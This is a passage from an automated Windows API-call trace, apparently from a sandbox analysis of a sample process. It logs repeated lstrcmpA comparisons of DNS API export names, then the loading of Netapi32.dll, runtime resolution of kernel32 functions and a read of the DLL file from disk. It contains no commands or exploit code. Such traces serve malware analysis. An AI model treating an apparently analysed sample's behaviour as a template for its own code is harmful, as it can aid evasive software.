lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0227.072] lstrcmpA (lpString1="AddRefQueryBlobEx", lpString2="AddRefQueryBlobEx") returned 0 [0227.072] lstrcmpA (lpString1="BreakRecordsIntoBlob", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0227.072] lstrcmpA (lpString1="BreakRecordsIntoBlob", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0227.072] lstrcmpA (lpString1="BreakRecordsIntoBlob", lpString2="AddRefQueryBlobEx") returned 1 [0227.072] lstrcmpA (lpString1="BreakRecordsIntoBlob", lpString2="BreakRecordsIntoBlob") returned 0 [0227.072] lstrcmpA (lpString1="Coalesce_UpdateNetVersion", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0227.072] lstrcmpA (lpString1="Coalesce_UpdateNetVersion", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0227.072] lstrcmpA (lpString1="Coalesce_UpdateNetVersion", lpString2="AddRefQueryBlobEx") returned 1 [0227.072] lstrcmpA (lpString1="Coalesce_UpdateNetVersion", lpString2="BreakRecordsIntoBlob") returned 1 [0227.072] lstrcmpA (lpString1="Coalesce_UpdateNetVersion", lpString2="Coalesce_UpdateNetVersion") returned 0 [0227.072] lstrcmpA (lpString1="CombineRecordsInBlob", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0227.072] lstrcmpA (lpString1="CombineRecordsInBlob", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0227.072] lstrcmpA (lpString1="CombineRecordsInBlob", lpString2="AddRefQueryBlobEx") returned 1 [0227.072] lstrcmpA (lpString1="CombineRecordsInBlob", lpString2="BreakRecordsIntoBlob") returned 1 [0227.072] lstrcmpA (lpString1="CombineRecordsInBlob", lpString2="Coalesce_UpdateNetVersion") returned 1 [0227.072] lstrcmpA (lpString1="CombineRecordsInBlob", lpString2="CombineRecordsInBlob") returned 0 [0227.073] lstrcmpA (lpString1="DeRefQueryBlobEx", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0227.073] lstrcmpA (lpString1="DeRefQueryBlobEx", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0227.073] lstrcmpA (lpString1="DeRefQueryBlobEx", lpString2="AddRefQueryBlobEx") returned 1 [0227.073] lstrcmpA (lpString1="DeRefQueryBlobEx", lpString2="BreakRecordsIntoBlob") returned 1 [0227.073] lstrcmpA (lpString1="DeRefQueryBlobEx", lpString2="Coalesce_UpdateNetVersion") returned 1 [0227.073] lstrcmpA (lpString1="DeRefQueryBlobEx", lpString2="CombineRecordsInBlob") returned 1 [0227.073] lstrcmpA (lpString1="DeRefQueryBlobEx", lpString2="DeRefQueryBlobEx") returned 0 [0227.073] lstrcmpA (lpString1="DelaySortDAServerlist", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0227.073] lstrcmpA (lpString1="DelaySortDAServerlist", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0227.073] lstrcmpA (lpString1="DelaySortDAServerlist", lpString2="AddRefQueryBlobEx") returned 1 [0227.073] lstrcmpA (lpString1="DelaySortDAServerlist", lpString2="BreakRecordsIntoBlob") returned 1 [0227.073] lstrcmpA (lpString1="DelaySortDAServerlist", lpString2="Coalesce_UpdateNetVersion") returned 1 [0227.073] lstrcmpA (lpString1="DelaySortDAServerlist", lpString2="CombineRecordsInBlob") returned 1 [0227.073] lstrcmpA (lpString1="DelaySortDAServerlist", lpString2="DeRefQueryBlobEx") returned -1 [0227.073] lstrcmpA (lpString1="DelaySortDAServerlist", lpString2="DelaySortDAServerlist") returned 0 [0227.073] lstrcmpA (lpString1="DnsAcquireContextHandle_A", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0227.073] lstrcmpA (lpString1="DnsAcquireContextHandle_A", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0227.073] lstrcmpA (lpString1="DnsAcquireContextHandle_A", lpString2="AddRefQueryBlobEx") returned 1 [0227.073] lstrcmpA (lpString1="DnsAcquireContextHandle_A", lpString2="BreakRecordsIntoBlob") returned 1 [0227.073] lstrcmpA (lpString1="DnsAcquireContextHandle_A", lpString2="Coalesce_UpdateNetVersion") returned 1 [0227.073] lstrcmpA (lpString1="DnsAcquireContextHandle_A", lpString2="CombineRecordsInBlob") returned 1 [0227.073] lstrcmpA (lpString1="DnsAcquireContextHandle_A", lpString2="DeRefQueryBlobEx") returned 1 [0227.073] lstrcmpA (lpString1="DnsAcquireContextHandle_A", lpString2="DelaySortDAServerlist") returned 1 [0227.073] lstrcmpA (lpString1="DnsAcquireContextHandle_A", lpString2="DnsAcquireContextHandle_A") returned 0 [0227.073] lstrcmpA (lpString1="DnsAcquireContextHandle_W", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0227.074] lstrcmpA (lpString1="DnsAcquireContextHandle_W", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0227.074] lstrcmpA (lpString1="DnsAcquireContextHandle_W", lpString2="AddRefQueryBlobEx") returned 1 [0227.074] lstrcmpA (lpString1="DnsAcquireContextHandle_W", lpString2="BreakRecordsIntoBlob") returned 1 [0227.074] lstrcmpA (lpString1="DnsAcquireContextHandle_W", lpString2="Coalesce_UpdateNetVersion") returned 1 [0227.074] lstrcmpA (lpString1="DnsAcquireContextHandle_W", lpString2="CombineRecordsInBlob") returned 1 [0227.074] lstrcmpA (lpString1="DnsAcquireContextHandle_W", lpString2="DeRefQueryBlobEx") returned 1 [0227.074] lstrcmpA (lpString1="DnsAcquireContextHandle_W", lpString2="DelaySortDAServerlist") returned 1 [0227.074] lstrcmpA (lpString1="DnsAcquireContextHandle_W", lpString2="DnsAcquireContextHandle_A") returned 1 [0227.074] lstrcmpA (lpString1="DnsAcquireContextHandle_W", lpString2="DnsAcquireContextHandle_W") returned 0 [0227.074] lstrcmpA (lpString1="DnsAllocateRecord", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0227.074] lstrcmpA (lpString1="DnsAllocateRecord", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0227.074] lstrcmpA (lpString1="DnsAllocateRecord", lpString2="AddRefQueryBlobEx") returned 1 [0227.074] lstrcmpA (lpString1="DnsAllocateRecord", lpString2="BreakRecordsIntoBlob") returned 1 [0227.074] lstrcmpA (lpString1="DnsAllocateRecord", lpString2="Coalesce_UpdateNetVersion") returned 1 [0227.074] lstrcmpA (lpString1="DnsAllocateRecord", lpString2="CombineRecordsInBlob") returned 1 [0227.074] lstrcmpA (lpString1="DnsAllocateRecord", lpString2="DeRefQueryBlobEx") returned 1 [0227.074] lstrcmpA (lpString1="DnsAllocateRecord", lpString2="DelaySortDAServerlist") returned 1 [0227.074] lstrcmpA (lpString1="DnsAllocateRecord", lpString2="DnsAcquireContextHandle_A") returned 1 [0227.074] lstrcmpA (lpString1="DnsAllocateRecord", lpString2="DnsAcquireContextHandle_W") returned 1 [0227.074] lstrcmpA (lpString1="DnsAllocateRecord", lpString2="DnsAllocateRecord") returned 0 [0227.074] lstrcmpA (lpString1="DnsApiAlloc", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0227.074] lstrcmpA (lpString1="DnsApiAlloc", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0227.074] lstrcmpA (lpString1="DnsApiAlloc", lpString2="AddRefQueryBlobEx") returned 1 [0227.074] lstrcmpA (lpString1="DnsApiAlloc", lpString2="BreakRecordsIntoBlob") returned 1 [0227.074] lstrcmpA (lpString1="DnsApiAlloc", lpString2="Coalesce_UpdateNetVersion") returned 1 [0227.074] lstrcmpA (lpString1="DnsApiAlloc", lpString2="CombineRecordsInBlob") returned 1 [0227.074] lstrcmpA (lpString1="DnsApiAlloc", lpString2="DeRefQueryBlobEx") returned 1 [0227.074] lstrcmpA (lpString1="DnsApiAlloc", lpString2="DelaySortDAServerlist") returned 1 [0227.075] lstrcmpA (lpString1="DnsApiAlloc", lpString2="DnsAcquireContextHandle_A") returned 1 [0227.075] lstrcmpA (lpString1="DnsApiAlloc", lpString2="DnsAcquireContextHandle_W") returned 1 [0227.075] lstrcmpA (lpString1="DnsApiAlloc", lpString2="DnsAllocateRecord") returned 1 [0227.075] lstrcmpA (lpString1="DnsApiAlloc", lpString2="DnsApiAlloc") returned 0 [0227.075] lstrcmpA (lpString1="DnsApiAllocZero", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0227.075] lstrcmpA (lpString1="DnsApiAllocZero", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0227.075] lstrcmpA (lpString1="DnsApiAllocZero", lpString2="AddRefQueryBlobEx") returned 1 [0227.075] lstrcmpA (lpString1="DnsApiAllocZero", lpString2="BreakRecordsIntoBlob") returned 1 [0227.075] lstrcmpA (lpString1="DnsApiAllocZero", lpString2="Coalesce_UpdateNetVersion") returned 1 [0227.075] lstrcmpA (lpString1="DnsApiAllocZero", lpString2="CombineRecordsInBlob") returned 1 [0227.075] lstrcmpA (lpString1="DnsApiAllocZero", lpString2="DeRefQueryBlobEx") returned 1 [0227.075] lstrcmpA (lpString1="DnsApiAllocZero", lpString2="DelaySortDAServerlist") returned 1 [0227.075] lstrcmpA (lpString1="DnsApiAllocZero", lpString2="DnsAcquireContextHandle_A") returned 1 [0227.075] lstrcmpA (lpString1="DnsApiAllocZero", lpString2="DnsAcquireContextHandle_W") returned 1 [0227.075] lstrcmpA (lpString1="DnsApiAllocZero", lpString2="DnsAllocateRecord") returned 1 [0227.075] lstrcmpA (lpString1="DnsApiAllocZero", lpString2="DnsApiAlloc") returned 1 [0227.075] lstrcmpA (lpString1="DnsApiAllocZero", lpString2="DnsApiAllocZero") returned 0 [0227.075] lstrcmpA (lpString1="DnsApiFree", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0227.076] lstrcmpA (lpString1="DnsApiFree", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0227.076] lstrcmpA (lpString1="DnsApiFree", lpString2="AddRefQueryBlobEx") returned 1 [0227.076] lstrcmpA (lpString1="DnsApiFree", lpString2="BreakRecordsIntoBlob") returned 1 [0227.076] lstrcmpA (lpString1="DnsApiFree", lpString2="Coalesce_UpdateNetVersion") returned 1 [0227.076] lstrcmpA (lpString1="DnsApiFree", lpString2="CombineRecordsInBlob") returned 1 [0227.076] lstrcmpA (lpString1="DnsApiFree", lpString2="DeRefQueryBlobEx") returned 1 [0227.076] lstrcmpA (lpString1="DnsApiFree", lpString2="DelaySortDAServerlist") returned 1 [0227.076] lstrcmpA (lpString1="DnsApiFree", lpString2="DnsAcquireContextHandle_A") returned 1 [0227.076] lstrcmpA (lpString1="DnsApiFree", lpString2="DnsAcquireContextHandle_W") returned 1 [0227.076] lstrcmpA (lpString1="DnsApiFree", lpString2="DnsAllocateRecord") returned 1 [0227.076] lstrcmpA (lpString1="DnsApiFree", lpString2="DnsApiAlloc") returned 1 [0227.076] lstrcmpA (lpString1="DnsApiFree", lpString2="DnsApiAllocZero") returned 1 [0227.076] lstrcmpA (lpString1="DnsApiFree", lpString2="DnsApiFree") returned 0 [0227.076] lstrcmpA (lpString1="DnsApiHeapReset", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0227.076] lstrcmpA (lpString1="DnsApiHeapReset", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0227.076] lstrcmpA (lpString1="DnsApiHeapReset", lpString2="AddRefQueryBlobEx") returned 1 [0227.076] lstrcmpA (lpString1="DnsApiHeapReset", lpString2="BreakRecordsIntoBlob") returned 1 [0227.076] lstrcmpA (lpString1="DnsApiHeapReset", lpString2="Coalesce_UpdateNetVersion") returned 1 [0227.076] lstrcmpA (lpString1="DnsApiHeapReset", lpString2="CombineRecordsInBlob") returned 1 [0227.076] lstrcmpA (lpString1="DnsApiHeapReset", lpString2="DeRefQueryBlobEx") returned 1 [0227.076] lstrcmpA (lpString1="DnsApiHeapReset", lpString2="DelaySortDAServerlist") returned 1 [0227.076] lstrcmpA (lpString1="DnsApiHeapReset", lpString2="DnsAcquireContextHandle_A") returned 1 [0227.076] lstrcmpA (lpString1="DnsApiHeapReset", lpString2="DnsAcquireContextHandle_W") returned 1 [0227.076] lstrcmpA (lpString1="DnsApiHeapReset", lpString2="DnsAllocateRecord") returned 1 [0227.077] lstrcmpA (lpString1="DnsApiHeapReset", lpString2="DnsApiAlloc") returned 1 [0227.077] lstrcmpA (lpString1="DnsApiHeapReset", lpString2="DnsApiAllocZero") returned 1 [0227.077] lstrcmpA (lpString1="DnsApiHeapReset", lpString2="DnsApiFree") returned 1 [0227.077] lstrcmpA (lpString1="DnsApiHeapReset", lpString2="DnsApiHeapReset") returned 0 [0227.077] lstrcmpA (lpString1="DnsApiRealloc", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0227.077] lstrcmpA (lpString1="DnsApiRealloc", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0227.077] lstrcmpA (lpString1="DnsApiRealloc", lpString2="AddRefQueryBlobEx") returned 1 [0227.077] lstrcmpA (lpString1="DnsApiRealloc", lpString2="BreakRecordsIntoBlob") returned 1 [0227.077] lstrcmpA (lpString1="DnsApiRealloc", lpString2="Coalesce_UpdateNetVersion") returned 1 [0227.077] lstrcmpA (lpString1="DnsApiRealloc", lpString2="CombineRecordsInBlob") returned 1 [0227.077] lstrcmpA (lpString1="DnsApiRealloc", lpString2="DeRefQueryBlobEx") returned 1 [0227.077] lstrcmpA (lpString1="DnsApiRealloc", lpString2="DelaySortDAServerlist") returned 1 [0227.077] lstrcmpA (lpString1="DnsApiRealloc", lpString2="DnsAcquireContextHandle_A") returned 1 [0227.077] lstrcmpA (lpString1="DnsApiRealloc", lpString2="DnsAcquireContextHandle_W") returned 1 [0227.077] lstrcmpA (lpString1="DnsApiRealloc", lpString2="DnsAllocateRecord") returned 1 [0227.077] lstrcmpA (lpString1="DnsApiRealloc", lpString2="DnsApiAlloc") returned 1 [0227.077] lstrcmpA (lpString1="DnsApiRealloc", lpString2="DnsApiAllocZero") returned 1 [0227.077] lstrcmpA (lpString1="DnsApiRealloc", lpString2="DnsApiFree") returned 1 [0227.077] lstrcmpA (lpString1="DnsApiRealloc", lpString2="DnsApiHeapReset") returned 1 [0227.077] lstrcmpA (lpString1="DnsApiRealloc", lpString2="DnsApiRealloc") returned 0 [0227.077] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0227.077] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0227.077] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="AddRefQueryBlobEx") returned 1 [0227.078] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="BreakRecordsIntoBlob") returned 1 [0227.078] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="Coalesce_UpdateNetVersion") returned 1 [0227.078] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="CombineRecordsInBlob") returned 1 [0227.078] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="DeRefQueryBlobEx") returned 1 [0227.078] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="DelaySortDAServerlist") returned 1 [0227.078] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="DnsAcquireContextHandle_A") returned 1 [0227.078] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="DnsAcquireContextHandle_W") returned 1 [0227.078] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="DnsAllocateRecord") returned 1 [0227.078] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="DnsApiAlloc") returned 1 [0227.078] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="DnsApiAllocZero") returned 1 [0227.078] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="DnsApiFree") returned 1 [0227.078] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="DnsApiHeapReset") returned 1 [0227.078] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="DnsApiRealloc") returned 1 [0227.078] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="DnsApiSetDebugGlobals") returned 0 [0227.078] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0227.078] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0227.078] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="AddRefQueryBlobEx") returned 1 [0227.078] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="BreakRecordsIntoBlob") returned 1 [0227.078] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="Coalesce_UpdateNetVersion") returned 1 [0227.078] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="CombineRecordsInBlob") returned 1 [0227.078] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="DeRefQueryBlobEx") returned 1 [0227.078] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="DelaySortDAServerlist") returned 1 [0227.078] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="DnsAcquireContextHandle_A") returned 1 [0227.078] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="DnsAcquireContextHandle_W") returned 1 [0227.078] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="DnsAllocateRecord") returned 1 [0227.079] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="DnsApiAlloc") returned 1 [0227.079] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="DnsApiAllocZero") returned 1 [0227.079] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="DnsApiFree") returned 1 [0227.079] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="DnsApiHeapReset") returned 1 [0227.079] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="DnsApiRealloc") returned 1 [0227.079] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="DnsApiSetDebugGlobals") returned 1 [0227.079] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="DnsAsyncRegisterHostAddrs") returned 0 [0227.079] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0227.079] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0227.079] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="AddRefQueryBlobEx") returned 1 [0227.079] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="BreakRecordsIntoBlob") returned 1 [0227.079] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="Coalesce_UpdateNetVersion") returned 1 [0227.079] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="CombineRecordsInBlob") returned 1 [0227.079] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="DeRefQueryBlobEx") returned 1 [0227.079] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="DelaySortDAServerlist") returned 1 [0227.079] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="DnsAcquireContextHandle_A") returned 1 [0227.079] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="DnsAcquireContextHandle_W") returned 1 [0227.079] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="DnsAllocateRecord") returned 1 [0227.079] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="DnsApiAlloc") returned 1 [0227.079] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="DnsApiAllocZero") returned 1 [0227.079] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="DnsApiFree") returned 1 [0227.079] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="DnsApiHeapReset") returned 1 [0227.079] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="DnsApiRealloc") returned 1 [0227.079] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="DnsApiSetDebugGlobals") returned 1 [0227.079] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="DnsAsyncRegisterHostAddrs") returned 1 [0227.079] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="DnsAsyncRegisterInit") returned 0 [0227.080] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0227.080] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0227.080] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="AddRefQueryBlobEx") returned 1 [0227.080] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="BreakRecordsIntoBlob") returned 1 [0227.080] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="Coalesce_UpdateNetVersion") returned 1 [0227.080] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="CombineRecordsInBlob") returned 1 [0227.080] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="DeRefQueryBlobEx") returned 1 [0227.080] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="DelaySortDAServerlist") returned 1 [0227.080] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="DnsAcquireContextHandle_A") returned 1 [0227.080] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="DnsAcquireContextHandle_W") returned 1 [0227.080] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="DnsAllocateRecord") returned 1 [0227.080] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="DnsApiAlloc") returned 1 [0227.080] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="DnsApiAllocZero") returned 1 [0227.080] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="DnsApiFree") returned 1 [0227.080] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="DnsApiHeapReset") returned 1 [0227.080] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="DnsApiRealloc") returned 1 [0227.080] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="DnsApiSetDebugGlobals") returned 1 [0227.080] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="DnsAsyncRegisterHostAddrs") returned 1 [0227.080] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="DnsAsyncRegisterInit") returned 1 [0227.080] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="DnsAsyncRegisterTerm") returned 0 [0227.080] lstrcmpA (lpString1="DnsCancelQuery", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0227.080] lstrcmpA (lpString1="DnsCancelQuery", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0227.081] lstrcmpA (lpString1="DnsCancelQuery", lpString2="AddRefQueryBlobEx") returned 1 [0227.081] lstrcmpA (lpString1="DnsCancelQuery", lpString2="BreakRecordsIntoBlob") returned 1 [0227.081] lstrcmpA (lpString1="DnsCancelQuery", lpString2="Coalesce_UpdateNetVersion") returned 1 [0227.081] lstrcmpA (lpString1="DnsCancelQuery", lpString2="CombineRecordsInBlob") returned 1 [0227.081] lstrcmpA (lpString1="DnsCancelQuery", lpString2="DeRefQueryBlobEx") returned 1 [0227.081] lstrcmpA (lpString1="DnsCancelQuery", lpString2="DelaySortDAServerlist") returned 1 [0227.081] lstrcmpA (lpString1="DnsCancelQuery", lpString2="DnsAcquireContextHandle_A") returned 1 [0227.081] lstrcmpA (lpString1="DnsCancelQuery", lpString2="DnsAcquireContextHandle_W") returned 1 [0227.081] lstrcmpA (lpString1="DnsCancelQuery", lpString2="DnsAllocateRecord") returned 1 [0227.081] lstrcmpA (lpString1="DnsCancelQuery", lpString2="DnsApiAlloc") returned 1 [0227.081] lstrcmpA (lpString1="DnsCancelQuery", lpString2="DnsApiAllocZero") returned 1 [0227.081] lstrcmpA (lpString1="DnsCancelQuery", lpString2="DnsApiFree") returned 1 [0227.081] lstrcmpA (lpString1="DnsCancelQuery", lpString2="DnsApiHeapReset") returned 1 [0227.081] lstrcmpA (lpString1="DnsCancelQuery", lpString2="DnsApiRealloc") returned 1 [0227.081] lstrcmpA (lpString1="DnsCancelQuery", lpString2="DnsApiSetDebugGlobals") returned 1 [0227.081] lstrcmpA (lpString1="DnsCancelQuery", lpString2="DnsAsyncRegisterHostAddrs") returned 1 [0227.081] lstrcmpA (lpString1="DnsCancelQuery", lpString2="DnsAsyncRegisterInit") returned 1 [0227.081] lstrcmpA (lpString1="DnsCancelQuery", lpString2="DnsAsyncRegisterTerm") returned 1 [0227.081] lstrcmpA (lpString1="DnsCancelQuery", lpString2="DnsCancelQuery") returned 0 [0227.081] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0227.081] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0227.081] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="AddRefQueryBlobEx") returned 1 [0227.081] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="BreakRecordsIntoBlob") returned 1 [0227.081] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="Coalesce_UpdateNetVersion") returned 1 [0227.081] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="CombineRecordsInBlob") returned 1 [0227.081] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="DeRefQueryBlobEx") returned 1 [0227.082] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="DelaySortDAServerlist") returned 1 [0227.082] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="DnsAcquireContextHandle_A") returned 1 [0227.082] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="DnsAcquireContextHandle_W") returned 1 [0227.082] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="DnsAllocateRecord") returned 1 [0227.082] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="DnsApiAlloc") returned 1 [0227.082] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="DnsApiAllocZero") returned 1 [0227.082] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="DnsApiFree") returned 1 [0227.082] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="DnsApiHeapReset") returned 1 [0227.082] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="DnsApiRealloc") returned 1 [0227.082] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="DnsApiSetDebugGlobals") returned 1 [0227.082] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="DnsAsyncRegisterHostAddrs") returned 1 [0227.091] GetProcessHeap () returned 0x570000 [0227.091] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x3a7d010 | out: hHeap=0x570000) returned 1 [0227.091] GetProcessHeap () returned 0x570000 [0227.091] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x10) returned 0x589380 [0227.092] LoadLibraryA (lpLibFileName="Netapi32.dll") returned 0x7ffc5cb30000 [0227.096] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleFileNameA") returned 0x7ffc5ecf6e30 [0227.096] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CreateFileA") returned 0x7ffc5ecfd8a0 [0227.097] GetModuleFileNameA (in: hModule=0x7ffc5cb30000, lpFilename=0x14f5d0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\Netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll")) returned 0x20 [0227.097] CreateFileA (lpFileName="C:\\Windows\\system32\\Netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x17c [0227.097] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetFileSizeEx") returned 0x7ffc5ecfdaa0 [0227.098] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CloseHandle") returned 0x7ffc5ecfd650 [0227.098] GetFileSizeEx (in: hFile=0x17c, lpFileSize=0x14f5b0 | out: lpFileSize=0x14f5b0*=80640) returned 1 [0227.098] GetProcessHeap () returned 0x570000 [0227.098] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13b00) returned 0x2d45030 [0227.326] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadFile") returned 0x7ffc5ecfdbd0 [0227.326] ReadFile (in: hFile=0x17c, lpBuffer=0x2d45030, nNumberOfBytesToRead=0x13b00, lpNumberOfBytesRead=0x14f5a4, lpOverlapped=0x0 | out: lpBuffer=0x2d45030*, lpNumberOfBytesRead=0x14f5a4*=0x13b00, lpOverlapped=0x0) returned 1 [0227.327] CloseHandle (hObject=0x17c) returned 1 [0227.327] 